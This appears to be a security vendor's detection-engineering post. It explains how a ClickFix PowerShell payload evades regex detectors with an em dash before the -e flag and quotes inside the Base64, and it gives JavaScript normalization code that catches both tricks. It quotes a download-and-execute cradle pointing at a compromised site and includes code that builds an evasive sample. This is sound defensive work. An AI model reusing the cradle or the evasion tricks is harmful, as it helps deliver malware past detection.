Detection Engineering February 2026

Em Dash Evasion — How ClickFix Attackers Exploit PowerShell's Unicode Tolerance

PowerShell accepts em dashes as parameter prefixes. Regex-based detectors don't. We found a ClickFix payload weaponizing this gap with a second layer of quote fragmentation on top.

The Technique

The payload used an em dash (U+2014, —) instead of a standard ASCII hyphen (U+002D, -) before the -e encoded-command flag. PowerShell treats both identically when parsing parameters, but every regex pattern matching -enc, -encodedcommand, or -e expects the ASCII hyphen.

pOweRSHeLL —e a"QBy"AG0AIA"B"oA"H"QAdABwAHMA...

A second evasion layer was stacked on top: double quotes scattered throughout the Base64 blob. The string a"QBy"AG0A breaks contiguous pattern matching for Base64 runs like [A-Za-z0-9+/=]{20,}. PowerShell silently strips the quotes during argument parsing and reassembles valid Base64.

The decoded payload was a standard download cradle: irm https://corpstrat.com/wp-content/uploads/2026/02/run.ps1 | iex — a compromised WordPress site hosting a second-stage PowerShell script.

How We Added Detection

Two normalization steps were added to the scoring pipeline, running before any pattern matching:

```javascript
// Normalize all Unicode dash variants to ASCII hyphen-minus
sample = sample.replace(/[\u2010-\u2015\u2212\uFE58\uFE63\uFF0D]/g, "-");
// Strip embedded double/single quotes that fragment tokens
sample = sample.replace(/["']/g, "");
```

The dash normalization covers en dash (U+2013), em dash (U+2014), figure dash (U+2012), horizontal bar (U+2015), mathematical minus (U+2212), and fullwidth hyphen (U+FF0D) — every Unicode codepoint that PowerShell accepts as a parameter prefix.

After normalization, the payload becomes pOweRSHeLL -e aQByAG0AIABoAHQ... — clean Base64, ASCII hyphen — and scores 95 against existing patterns. Blocked.
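The two normalization steps and a naive ASCII-only detector, run over a constructed sample built the same way as the payload above, as an added example rather than the pipeline code from this post; the detection regexes, the six-character fragmentation interval and the placeholder cradle on a reserved .invalid domain are assumptions.

```javascript
// Added example: Unicode-dash and quote normalization ahead of pattern matching,
// exercised on a constructed ClickFix-style sample (not the real payload).

// Dash variants folded to ASCII hyphen-minus (same class as the post's pipeline).
const DASH_VARIANTS = /[\u2010-\u2015\u2212\uFE58\uFE63\uFF0D]/g;
// Quote characters scattered through the Base64 blob to break contiguous runs.
const QUOTE_FRAGMENTS = /["']/g;

function normalize(sample) {
  return sample.replace(DASH_VARIANTS, "-").replace(QUOTE_FRAGMENTS, "");
}

// Naive ASCII-only patterns (assumed here; not the post's scoring rules).
const ENCODED_FLAG = /\bpowershell(?:\.exe)?\s+-e(?:c|nc|ncodedcommand)?\s/i;
const BASE64_RUN = /[A-Za-z0-9+/=]{20,}/;

function detect(sample) {
  return { flag: ENCODED_FLAG.test(sample), base64: BASE64_RUN.test(sample) };
}

// -EncodedCommand takes Base64 of the UTF-16LE command; recover it after normalization.
function decodeEncodedCommand(normalized) {
  const m = /-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)/i.exec(normalized);
  return m ? Buffer.from(m[1], "base64").toString("utf16le") : null;
}

// Insert a double quote every `every` chars so no run reaches the 20-char threshold.
function fragmentWithQuotes(b64, every = 6) {
  return b64.match(new RegExp(`.{1,${every}}`, "g")).join('"');
}

// Constructed sample: placeholder cradle (example.invalid), em dash (U+2014) before the flag.
const CRADLE = "irm https://example.invalid/run.ps1 | iex";
const RAW_SAMPLE =
  "pOweRSHeLL \u2014e " +
  fragmentWithQuotes(Buffer.from(CRADLE, "utf16le").toString("base64"));

console.log("raw       :", detect(RAW_SAMPLE));            // both false: the evasion works
console.log("normalized:", detect(normalize(RAW_SAMPLE))); // both true
console.log("decoded   :", decodeEncodedCommand(normalize(RAW_SAMPLE)));
```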

Detection Status

Both em dash flag evasion and inline quote fragmentation are now caught at the normalization layer before pattern matching begins. The normalization is additive — it runs on every clipboard sample regardless of content, and existing patterns match against the cleaned output. No false positive surface was introduced.

DiTM Security © 2026